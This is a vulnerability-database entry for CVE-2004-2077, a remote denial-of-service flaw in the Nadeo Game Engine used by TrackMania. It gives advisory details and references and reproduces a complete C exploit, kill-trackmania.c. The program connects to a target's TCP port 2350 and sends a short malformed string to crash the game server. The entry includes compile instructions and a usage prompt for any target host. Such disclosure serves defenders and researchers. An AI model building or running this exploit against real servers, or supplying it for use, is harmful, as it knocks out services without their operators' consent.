Nadeo Game Engine Remote Denial of Service Vulnerability

Vulnerability ID: 1107703 Vulnerability type: Other
Published: 2004-02-09 Updated: 2005-10-20
CVE ID: CVE-2004-2077
CNNVD-ID: CNNVD-200402-033
Platform: Linux CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/23662
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-033
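|Vulnerability details
The Nadeo Game Engine, as used in Nadeo TrackMania and Nadeo Virtual Skipper 3, contains a vulnerability. A remote attacker can cause a denial of service (server crash) by sending malformed data to TCP port 2350; the issue may depend on long values or an incorrect size field.
|Exploit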
source: http://www.securityfocus.com/bid/9604/info

It has been reported that Nadeo Game Engine may be prone to a remote denial of service vulnerability that could allow an attacker to cause the software to crash or hang by sending arbitrary data to the software on TCP port 2350.

Nadeo Trackmania demo version has been reported to be affected by this issue.

/*
* [kill-trackmania.c]
* A remote DoS that affects the Trackmania game server
*
* by Scrap
* [email protected]
* http://www.securiteinfo.com
*
* gcc kill-trackmania.c -o kill-trackmania -O2
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in sin;
    struct hostent *he;
    unsigned long start;
    char buffer[1024];
    unsigned long counter;

    printf("\n [kill-trackmania.c] by Scrap / Securiteinfo.com\n");

    if (argc<2)
    {
        printf("Usage: %s target\n\n",argv[0]);
        exit(0);
    }

    /* Resolve the host name given on the command line */
    if ((he=gethostbyname(argv[1])) == NULL)
    {
        herror("gethostbyname");
        exit(0);
    }

    start=inet_addr(argv[1]);
    counter=ntohl(start);

    /* TCP connection to the game server port named in the advisory */
    sock=socket(AF_INET, SOCK_STREAM, 0);
    memset(&sin, 0, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(2350);

    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
        perror("connect");
        exit(0);
    }
    printf("\n\t Sending Bomb... \n");
    /* Only the first 17 bytes of the string are sent */
    send(sock, "Bomb from Securiteinfo.com\n\n",17,0);
    close(sock);

    printf("\t Bomb sent...\n");

    return 0;
}
|References

Source: XF
Name: trackmania-dos(15081)
Link: http://xforce.iss.net/xforce/xfdb/15081
Source: BID
Name: 9604
Link: http://www.securityfocus.com/bid/9604
Source: BUGTRAQ
Name: 20040209 Re: TrackMania Demo Denial of Service
Link: http://www.securityfocus.com/archive/1/353226
Source: BUGTRAQ
Name: 20040208 TrackMania Demo Denial of Service
Link: http://www.securityfocus.com/archive/1/353182
Source: www.securiteinfo.com
Link: http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml
